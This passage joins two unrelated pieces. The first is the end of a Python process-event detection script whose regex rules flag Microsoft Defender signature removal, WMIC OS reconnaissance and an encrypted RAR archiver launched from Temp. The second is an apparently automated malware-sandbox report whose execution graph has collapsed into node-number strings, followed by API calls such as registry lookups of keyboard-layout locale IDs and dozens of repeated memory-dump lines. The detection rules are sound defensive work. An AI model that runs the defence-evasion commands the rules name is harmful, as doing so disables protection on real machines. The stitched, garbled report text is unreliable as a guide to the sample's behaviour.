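# MpCmdRun.exe -RemoveDefinitions deletes Defender's signature set; -All removes
# every definition type at once.
DEFENDER_REMOVE_DEFS = re.compile(r"MpCmdRun\.exe.*-RemoveDefinitions\b", re.IGNORECASE)

# OS version lookup via WMI, whether run directly or through cmd.exe /c.
WMIC_OS_CAPTION = re.compile(r"\bwmic(?:\.exe)?\s+os\s+get\s+caption\b", re.IGNORECASE)


def classify(image: str, cmdline: str) -> list[Alert]:
    """Return every rule that fires for a single process-creation event."""
    alerts: list[Alert] = []

    hp = RAR_HEADER_ENCRYPTION.search(cmdline)
    if hp and ARCHIVER_IN_TEMP.search(image):
        # Whichever alternative matched holds the password; surface it so the
        # responder can open the staged archive without brute-forcing it.
        password = hp.group(1) if hp.group(1) is not None else hp.group(2)
        alerts.append(Alert("archiver_in_temp_with_header_encryption", image,
                            f"password={password}"))

    if DEFENDER_REMOVE_DEFS.search(cmdline):
        alerts.append(Alert("defender_remove_definitions", image, cmdline))

    if WMIC_OS_CAPTION.search(cmdline):
        alerts.append(Alert("wmic_os_caption_recon", image, cmdline))

    return alerts


def scan(events) -> list[Alert]:
    """Run classify() over a sequence of (image, cmdline) events, in order."""
    return [alert for image, cmdline in events for alert in classify(image, cmdline)]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule:40} {a.image}\n    {a.detail}")
```

Run against the constructed events, the rar, MpCmdRun, cmd.exe and WMIC.exe launches each fire one rule and the two conhost launches and the WinRAR control fire none. The archiver rule deliberately requires both the Temp-directory image path and `-hp`, since either alone is common in legitimate use; the Defender rule keys on the switch rather than the path because an attacker can copy MpCmdRun.exe elsewhere.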
Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 29.6%
Total number of Nodes: 724
Total number of Limit Nodes: 23

[Execution graph: the interactive node/edge rendering does not survive text extraction. The surviving node labels cover addresses in the 0x261000-0x2a5000 range and name these Windows API calls: RtlAllocateHeap, ExitProcess, CreateThreadpoolWork, TpPostWork, TpReleaseWork, InitializeCriticalSectionEx, InitOnceExecuteOnce, GetSystemTimePreciseAsFileTime, Sleep, CreateMutexA, GetNativeSystemInfo, RegOpenKeyExA and RegCloseKey, plus a PEB read (GetPEB) on a path that ends in ExitProcess. The remaining labels are MSVC C++ runtime symbols (std::invalid_argument::invalid_argument, shared_ptr, ___std_exception_copy, __freea, Concurrency::cancel_current_task, Concurrency::details::_Reschedule_chore, __Mtx_init_in_situ, __Mtx_unlock, __Cnd_broadcast, __Xtime_diff_to_millis2, _xtime_get, __aulldvrm).]
std::invalid_argument::invalid_argument 11582->11587 11583->11582 11585 267dd2 11584->11585 11586 265c10 3 API calls 11585->11586 11589 267dff shared_ptr 11586->11589 11588 267ed3 GetNativeSystemInfo 11590 267ed7 11588->11590 11589->11588 11589->11590 11597 267fb1 ___std_exception_copy 11589->11597 11590->11587 11591 267f3f 11590->11591 11592 268019 11590->11592 11594 265c10 3 API calls 11591->11594 11593 265c10 3 API calls 11592->11593 11595 26804c 11593->11595 11596 267f67 11594->11596 11598 265c10 3 API calls 11595->11598 11600 265c10 3 API calls 11596->11600 11597->11587 11599 265c10 3 API calls 11597->11599 11603 26806b 11598->11603 11601 268427 11599->11601 11602 267f86 11600->11602 11604 265c10 3 API calls 11601->11604 11605 298bbe RtlAllocateHeap 11602->11605 11606 265c10 3 API calls 11603->11606 11604->11587 11605->11597 11607 2680a3 11606->11607 11608 265c10 3 API calls 11607->11608 11609 2680f4 11608->11609 11610 265c10 3 API calls 11609->11610 11611 268113 11610->11611 11612 265c10 3 API calls 11611->11612 11613 26814b 11612->11613 11614 265c10 3 API calls 11613->11614 11615 26819c 11614->11615 11616 265c10 3 API calls 11615->11616 11617 2681bb 11616->11617 11618 265c10 3 API calls 11617->11618 11619 2681f3 11618->11619 11620 265c10 3 API calls 11619->11620 11621 268244 11620->11621 11622 265c10 3 API calls 11621->11622 11623 268263 11622->11623 11624 265c10 3 API calls 11623->11624 11624->11587 11627 27d122 11625->11627 11626 2675ed 11626->11563 11626->11567 11627->11626 11637 27d199 11627->11637 11631 27d0d7 11629->11631 11630 27d17f 11630->11567 11631->11630 11632 27d17b RtlWakeAllConditionVariable 11631->11632 11632->11567 11634 266db0 shared_ptr ___std_exception_copy 11633->11634 11635 298ab6 RtlAllocateHeap 11634->11635 11636 266ec1 shared_ptr std::invalid_argument::invalid_argument 11634->11636 11635->11636 11636->11577 11638 27d1a7 SleepConditionVariableCS 11637->11638 11640 27d1c0 11637->11640 11638->11640 11640->11627 11641 269ba5 11642 269ba7 
11641->11642 11643 265c10 3 API calls 11642->11643 11644 269cb1 11643->11644 11645 268b30 3 API calls 11644->11645 11646 269cc2 11645->11646 10871 2620a0 10876 27c68b 10871->10876 10874 27d64e RtlAllocateHeap 10875 2620b6 10874->10875 10879 27c3d5 10876->10879 10878 2620ac 10878->10874 10880 27c3e1 10879->10880 10881 27c3eb 10879->10881 10882 27c3be 10880->10882 10883 27c39e 10880->10883 10881->10878 10892 27cd0a 10882->10892 10883->10881 10888 27ccd5 10883->10888 10886 27c3d0 10886->10878 10889 27cce3 InitializeCriticalSectionEx 10888->10889 10890 27c3b7 10888->10890 10889->10890 10890->10878 10893 27cd1f RtlInitializeConditionVariable 10892->10893 10893->10886 10650 26b1a0 10651 26b1f2 10650->10651 10652 26b3ad CoInitialize 10651->10652 10653 26b3fa shared_ptr std::invalid_argument::invalid_argument 10652->10653 10894 2670a0 10895 2670d2 ___std_exception_copy 10894->10895 10896 267243 std::invalid_argument::invalid_argument 10895->10896 10898 266ef0 10895->10898 10899 266f22 ___std_exception_copy 10898->10899 10901 266fd6 shared_ptr std::invalid_argument::invalid_argument 10899->10901 10902 298ab6 10899->10902 10901->10895 10903 298ad1 10902->10903 10904 298868 RtlAllocateHeap 10903->10904 10905 298adb 10904->10905 10905->10901 11663 267fa9 11664 267fab 11663->11664 11665 298bbe RtlAllocateHeap 11664->11665 11667 267fb1 ___std_exception_copy 11665->11667 11666 267ff2 shared_ptr std::invalid_argument::invalid_argument 11667->11666 11668 265c10 3 API calls 11667->11668 11669 268427 11668->11669 11670 265c10 3 API calls 11669->11670 11670->11666 10631 2687b2 10632 2687b6 10631->10632 10633 2687b8 GetFileAttributesA 10631->10633 10632->10633 10634 2687c4 10633->10634 11382 2642b0 11385 263ac0 11382->11385 11384 2642bb shared_ptr 11386 263af9 11385->11386 11387 2632d0 5 API calls 11386->11387 11388 263b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11386->11388 11390 263c38 11386->11390 11387->11390 11388->11384 11389 2632d0 5 API calls 11391 263c5f 
11389->11391 11390->11389 11390->11391 11391->11384 11671 2677b0 11672 2677f1 shared_ptr 11671->11672 11673 265c10 3 API calls 11672->11673 11675 267883 shared_ptr 11672->11675 11673->11675 11674 265c10 3 API calls 11677 2679e3 11674->11677 11675->11674 11676 267953 shared_ptr std::invalid_argument::invalid_argument 11675->11676 11678 265c10 3 API calls 11677->11678 11680 267a15 shared_ptr 11678->11680 11679 267aa5 shared_ptr std::invalid_argument::invalid_argument 11680->11679 11681 266d70 RtlAllocateHeap 11680->11681 11682 267b1b shared_ptr 11681->11682 11683 265c10 3 API calls 11682->11683 11687 267be3 shared_ptr ___std_exception_copy 11682->11687 11684 267b7d 11683->11684 11685 265c10 3 API calls 11684->11685 11686 267ba0 11685->11686 11688 265c10 3 API calls 11686->11688 11689 265c10 3 API calls 11687->11689 11714 267cf4 shared_ptr std::invalid_argument::invalid_argument 11687->11714 11688->11687 11690 267dd2 11689->11690 11691 265c10 3 API calls 11690->11691 11693 267dff shared_ptr 11691->11693 11692 267ed3 GetNativeSystemInfo 11694 267ed7 11692->11694 11693->11692 11693->11694 11695 267fb1 ___std_exception_copy 11693->11695 11696 267f3f 11694->11696 11697 268019 11694->11697 11694->11714 11703 265c10 3 API calls 11695->11703 11695->11714 11699 265c10 3 API calls 11696->11699 11698 265c10 3 API calls 11697->11698 11700 26804c 11698->11700 11701 267f67 11699->11701 11702 265c10 3 API calls 11700->11702 11704 265c10 3 API calls 11701->11704 11707 26806b 11702->11707 11705 268427 11703->11705 11706 267f86 11704->11706 11708 265c10 3 API calls 11705->11708 11709 298bbe RtlAllocateHeap 11706->11709 11710 265c10 3 API calls 11707->11710 11708->11714 11709->11695 11711 2680a3 11710->11711 11712 265c10 3 API calls 11711->11712 11713 2680f4 11712->11713 11715 265c10 3 API calls 11713->11715 11716 268113 11715->11716 11717 265c10 3 API calls 11716->11717 11718 26814b 11717->11718 11719 265c10 3 API calls 11718->11719 11720 26819c 11719->11720 11721 265c10 3 API calls 
11720->11721 11722 2681bb 11721->11722 11723 265c10 3 API calls 11722->11723 11724 2681f3 11723->11724 11725 265c10 3 API calls 11724->11725 11726 268244 11725->11726 11727 265c10 3 API calls 11726->11727 11728 268263 11727->11728 11729 265c10 3 API calls 11728->11729 11729->11714 11730 2687b0 11731 2687b6 11730->11731 11732 2687b8 GetFileAttributesA 11730->11732 11731->11732 11733 2687c4 11732->11733 11734 2747b0 11736 274eed 11734->11736 11735 274f59 shared_ptr std::invalid_argument::invalid_argument 11736->11735 11737 267d30 4 API calls 11736->11737 11738 2750ed 11737->11738 11773 268380 11738->11773 11740 275106 11741 265c10 3 API calls 11740->11741 11742 275155 11741->11742 11743 265c10 3 API calls 11742->11743 11744 275171 11743->11744 11779 269a00 11744->11779 11774 2683e5 ___std_exception_copy 11773->11774 11775 265c10 3 API calls 11774->11775 11778 268403 shared_ptr std::invalid_argument::invalid_argument 11774->11778 11776 268427 11775->11776 11777 265c10 3 API calls 11776->11777 11777->11778 11778->11740 11780 269a3f 11779->11780 11781 265c10 3 API calls 11780->11781 11782 269a47 11781->11782 11783 268b30 3 API calls 11782->11783 11784 269a58 11783->11784 11396 269ab8 11398 269acc 11396->11398 11399 269b08 11398->11399 11400 265c10 3 API calls 11399->11400 11401 269b7c 11400->11401 11408 268b30 11401->11408 11403 269b8d 11404 265c10 3 API calls 11403->11404 11405 269cb1 11404->11405 11406 268b30 3 API calls 11405->11406 11407 269cc2 11406->11407 11409 268b7c 11408->11409 11410 265c10 3 API calls 11409->11410 11411 268b97 shared_ptr std::invalid_argument::invalid_argument 11410->11411 11411->11403 10635 265c83 10637 265c91 shared_ptr ___std_exception_copy 10635->10637 10636 265d17 shared_ptr std::invalid_argument::invalid_argument 10637->10636 10638 265da7 RegOpenKeyExA 10637->10638 10639 265e00 RegCloseKey 10638->10639 10640 265e26 10639->10640 10641 265ea6 shared_ptr std::invalid_argument::invalid_argument 10640->10641 10642 265c10 3 API calls 
10640->10642 10643 2666ac 10642->10643 10644 265c10 3 API calls 10643->10644 10645 2666b1 shared_ptr 10644->10645 10646 265c10 3 API calls 10645->10646 10649 266852 shared_ptr std::invalid_argument::invalid_argument 10645->10649 10648 26673d shared_ptr 10646->10648 10647 265c10 3 API calls 10647->10648 10648->10647 10648->10649 11200 268980 11202 268aea 11200->11202 11203 2689d8 shared_ptr 11200->11203 11201 265c10 3 API calls 11201->11203 11203->11201 11203->11202 10930 263c8e 10931 263c98 10930->10931 10933 263ca5 10931->10933 10934 262410 10931->10934 10935 262424 10934->10935 10938 27b52d 10935->10938 10946 293aed 10938->10946 10941 27b5a5 ___std_exception_copy 10953 27b1ad 10941->10953 10942 27b598 10949 27af56 10942->10949 10945 26242a 10945->10933 10957 294f29 10946->10957 10948 27b555 10948->10941 10948->10942 10948->10945 10950 27af9f ___std_exception_copy 10949->10950 10952 27afb2 shared_ptr 10950->10952 10961 27b39f 10950->10961 10952->10945 10954 27b1d8 10953->10954 10956 27b1e1 shared_ptr 10953->10956 10955 27b39f InitOnceExecuteOnce 10954->10955 10955->10956 10956->10945 10959 294f2e ___std_exception_copy 10957->10959 10958 2965ed 3 API calls 10960 298c2f 10958->10960 10959->10948 10959->10958 10962 27bedf InitOnceExecuteOnce 10961->10962 10964 27b3e1 10962->10964 10963 27b3e8 10963->10952 10964->10963 10965 27bedf InitOnceExecuteOnce 10964->10965 10966 27b461 10965->10966 10966->10952 11801 262b90 11802 262bce 11801->11802 11803 27b7fb TpReleaseWork 11802->11803 11804 262bdb shared_ptr std::invalid_argument::invalid_argument 11803->11804 11805 263f9f 11806 263fad 11805->11806 11808 263fb6 11805->11808 11807 262410 4 API calls 11806->11807 11807->11808 11825 263fe0 11826 264022 11825->11826 11827 2640d2 11826->11827 11828 26408c 11826->11828 11831 264035 std::invalid_argument::invalid_argument 11826->11831 11829 263ee0 3 API calls 11827->11829 11832 2635e0 11828->11832 11829->11831 11833 263616 11832->11833 11837 26364e 
Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11833->11837 11838 262ce0 11833->11838 11835 26369e 11836 262c00 3 API calls 11835->11836 11835->11837 11836->11837 11837->11831 11839 262d1d 11838->11839 11840 27bedf InitOnceExecuteOnce 11839->11840 11841 262d46 11840->11841 11843 262d51 std::invalid_argument::invalid_argument 11841->11843 11844 27bef7 11841->11844 11843->11835 11845 27bf03 Concurrency::cancel_current_task 11844->11845 11846 27bf73 11845->11846 11847 27bf6a 11845->11847 11849 262ae0 InitOnceExecuteOnce 11846->11849 11851 27be7f 11847->11851 11850 27bf6f 11849->11850 11850->11843 11852 27cc31 InitOnceExecuteOnce 11851->11852 11853 27be97 11852->11853 11853->11850 11232 26a9f4 11243 269230 11232->11243 11234 26aa03 shared_ptr 11235 265c10 3 API calls 11234->11235 11241 26aab3 shared_ptr 11234->11241 11236 26aa65 11235->11236 11237 265c10 3 API calls 11236->11237 11238 26aa8d 11237->11238 11239 265c10 3 API calls 11238->11239 11239->11241 11240 298ab6 RtlAllocateHeap 11240->11241 11241->11240 11242 26ad3c shared_ptr std::invalid_argument::invalid_argument 11241->11242 11246 269284 shared_ptr 11243->11246 11244 265c10 3 API calls 11244->11246 11245 269543 shared_ptr std::invalid_argument::invalid_argument 11245->11234 11246->11244 11251 26944f shared_ptr 11246->11251 11247 265c10 3 API calls 11247->11251 11248 2698b5 shared_ptr std::invalid_argument::invalid_argument 11248->11234 11249 26979f shared_ptr 11249->11248 11250 265c10 3 API calls 11249->11250 11252 269927 shared_ptr std::invalid_argument::invalid_argument 11250->11252 11251->11245 11251->11247 11251->11249 11252->11234 11002 2620c0 11003 27c68b __Mtx_init_in_situ 2 API calls 11002->11003 11004 2620cc 11003->11004 11005 27d64e RtlAllocateHeap 11004->11005 11006 2620d6 11005->11006 11011 26e0c0 recv 11012 26e122 recv 11011->11012 11013 26e157 recv 11012->11013 11015 26e191 11013->11015 11014 26e2b3 std::invalid_argument::invalid_argument 11015->11014 11016 
27c6ac GetSystemTimePreciseAsFileTime 11015->11016 11017 26e2ee 11016->11017 11018 27c26a 4 API calls 11017->11018 11019 26e358 11018->11019 11870 2787d0 11871 27882a ___std_exception_copy 11870->11871 11877 279bb0 11871->11877 11874 27886c std::invalid_argument::invalid_argument 11876 2788d9 std::_Throw_future_error 11887 279ef0 11877->11887 11879 279be5 11880 262ce0 InitOnceExecuteOnce 11879->11880 11881 279c16 11880->11881 11891 279f70 11881->11891 11883 278854 11883->11874 11884 2643f0 11883->11884 11885 27bedf InitOnceExecuteOnce 11884->11885 11886 26440a 11885->11886 11886->11876 11888 279f0c 11887->11888 11889 27c68b __Mtx_init_in_situ 2 API calls 11888->11889 11890 279f17 11889->11890 11890->11879 11892 279fef shared_ptr 11891->11892 11894 27a058 11892->11894 11896 27a210 11892->11896 11895 27a03b 11895->11883 11897 27a290 11896->11897 11903 2771d0 11897->11903 11899 27a4be shared_ptr 11899->11895 11900 27a2cc shared_ptr 11900->11899 11901 263ee0 3 API calls 11900->11901 11902 27a4a6 11901->11902 11902->11895 11904 277211 11903->11904 11911 263970 11904->11911 11906 277446 std::invalid_argument::invalid_argument 11906->11900 11907 2772ad ___std_exception_copy 11907->11906 11908 27c68b __Mtx_init_in_situ 2 API calls 11907->11908 11909 277401 11908->11909 11916 262ec0 11909->11916 11912 27c68b __Mtx_init_in_situ 2 API calls 11911->11912 11913 2639a7 11912->11913 11914 27c68b __Mtx_init_in_situ 2 API calls 11913->11914 11915 2639e6 11914->11915 11915->11907 11917 262f06 11916->11917 11921 262f6f 11916->11921 11918 27c6ac GetSystemTimePreciseAsFileTime 11917->11918 11919 262f12 11918->11919 11922 26301e 11919->11922 11926 262f1d __Mtx_unlock 11919->11926 11920 262fef 11920->11906 11921->11920 11927 27c6ac GetSystemTimePreciseAsFileTime 11921->11927 11923 27c26a 4 API calls 11922->11923 11924 263024 11923->11924 11925 27c26a 4 API calls 11924->11925 11928 262fb9 11925->11928 11926->11921 11926->11924 11927->11928 11929 27c26a 4 API calls 11928->11929 11930 
262fc0 __Mtx_unlock 11928->11930 11929->11930 11931 27c26a 4 API calls 11930->11931 11932 262fd8 __Cnd_broadcast 11930->11932 11931->11932 11932->11920 11933 27c26a 4 API calls 11932->11933 11934 26303c 11933->11934 11935 27c6ac GetSystemTimePreciseAsFileTime 11934->11935 11945 263080 shared_ptr __Mtx_unlock 11935->11945 11936 2631c5 11937 27c26a 4 API calls 11936->11937 11938 2631cb 11937->11938 11939 27c26a 4 API calls 11938->11939 11940 2631d1 11939->11940 11941 27c26a 4 API calls 11940->11941 11947 263193 __Mtx_unlock 11941->11947 11942 2631a7 std::invalid_argument::invalid_argument 11942->11906 11943 27c26a 4 API calls 11944 2631dd 11943->11944 11945->11936 11945->11938 11945->11942 11946 27c6ac GetSystemTimePreciseAsFileTime 11945->11946 11948 26315f 11946->11948 11947->11942 11947->11943 11948->11936 11948->11940 11948->11947 11949 27bd4c GetSystemTimePreciseAsFileTime 11948->11949 11949->11948 11465 269adc 11466 269aea 11465->11466 11470 269afe shared_ptr 11465->11470 11467 26a917 11466->11467 11466->11470 11468 26a953 Sleep CreateMutexA 11467->11468 11469 26a98e 11468->11469 11471 265c10 3 API calls 11470->11471 11472 269b7c 11471->11472 11473 268b30 3 API calls 11472->11473 11474 269b8d 11473->11474 11475 265c10 3 API calls 11474->11475 11476 269cb1 11475->11476 11477 268b30 3 API calls 11476->11477 11478 269cc2 11477->11478

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 265c83-265c8f 1 265ca5-265cf7 call 27d663 0->1 2 265c91-265c9f 0->2 12 265d21-265d3c call 27cff1 1->12 13 265cf9-265d05 1->13 2->1 3 265d3d 2->3 5 265d42-265e23 call 296c6a call 2940f0 RegOpenKeyExA RegCloseKey 3->5 6 265d3d call 296c6a 3->6 24 265e26-265e2b 5->24 6->5 15 265d17-265d1e call 27d663 13->15 16 265d07-265d15 13->16 15->12 16->5 16->15 24->24 25 265e2d-265e86 call 2780c0 24->25 29 265eb0-265ecc call 27cff1 25->29 30 265e88-265e94 25->30 31 265ea6-265ead call 27d663 30->31 32 265e96-265ea4 30->32 31->29 32->31 34 265ecd-265fde call 296c6a 32->34 45 265fe0-265fec 34->45 46 266008-266015 call 27cff1 34->46 47 265ffe-266005 call 27d663 45->47 48 265fee-265ffc 45->48 47->46 48->47 50 266016-26658e call 296c6a call 27e150 call 2780c0 * 5 48->50 74 266590-26659f 50->74 75 2665bb-2665d6 call 27cff1 50->75 76 2665b1-2665b8 call 27d663 74->76 77 2665a1-2665af 74->77 76->75 77->76 79 2665d7-2666b8 call 296c6a call 277a00 call 265c10 77->79 95 2666bc-2666db call 2622c0 79->95 96 2666ba 79->96 99 26670c-266712 95->99 100 2666dd-2666ec 95->100 96->95 103 266715-26671a 99->103 101 266702-266709 call 27d663 100->101 102 2666ee-2666fc 100->102 101->99 102->101 104 266937 call 296c6a 102->104 103->103 106 26671c-266744 call 277a00 call 265c10 103->106 110 26693c call 296c6a 104->110 116 266746 106->116 117 266748-266769 call 2622c0 106->117 114 266941-266d6f call 296c6a call 278200 call 296c6a 110->114 116->117 124 26679a-2667ae 117->124 125 26676b-26677a 117->125 134 2667b4-2667ba 124->134 135 266858-26687c 124->135 127 266790-266797 call 27d663 125->127 128 26677c-26678a 125->128 127->124 128->110 128->127 138 2667c0-2667ed call 277a00 call 265c10 134->138 136 266880-266885 135->136 136->136 139 266887-2668ec call 2780c0 * 2 136->139 152 2667f1-266818 call 2622c0 138->152 153 2667ef 138->153 150 2668ee-2668fd 139->150 151 266919-266936 call 27cff1 139->151 154 26690f-266916 call 27d663 150->154 155 2668ff-26690d 150->155 162 26681a-266829 152->162 163 266849-26684c 152->163 153->152 154->151 155->114 155->154 164 26683f-266846 call 27d663 162->164 165 26682b-266839 162->165 163->138 166 266852 163->166 164->163 165->104 165->164 166->135

APIs
• RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,c13L,4C333163), ref: 00265DCC
• RegQueryValueExA.KERNEL32(c13L,?,00000000,00000000,?,00000400,?,?,00000000,00000001,c13L,4C333163), ref: 00265DFA
• RegCloseKey.KERNEL32(c13L,?,?,00000000,00000001,c13L,4C333163), ref: 00265E06
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$c13L$c13L$c13L$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 3677997916-3570576523
                                                                                                                                                                                                                                          • Opcode ID: 90d5a8902eb93a936b1588c38eb5957eeb8fcb017875500416698c098b383ed9
                                                                                                                                                                                                                                          • Instruction ID: 87e6b818d1e5619962e4f3254a2691660af9560eacfe081202478a57da9767a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d5a8902eb93a936b1588c38eb5957eeb8fcb017875500416698c098b383ed9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C20571A202189BDF28DF68CC89BDDB779EF45304F508299E409A72C1DB759AE4CF90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
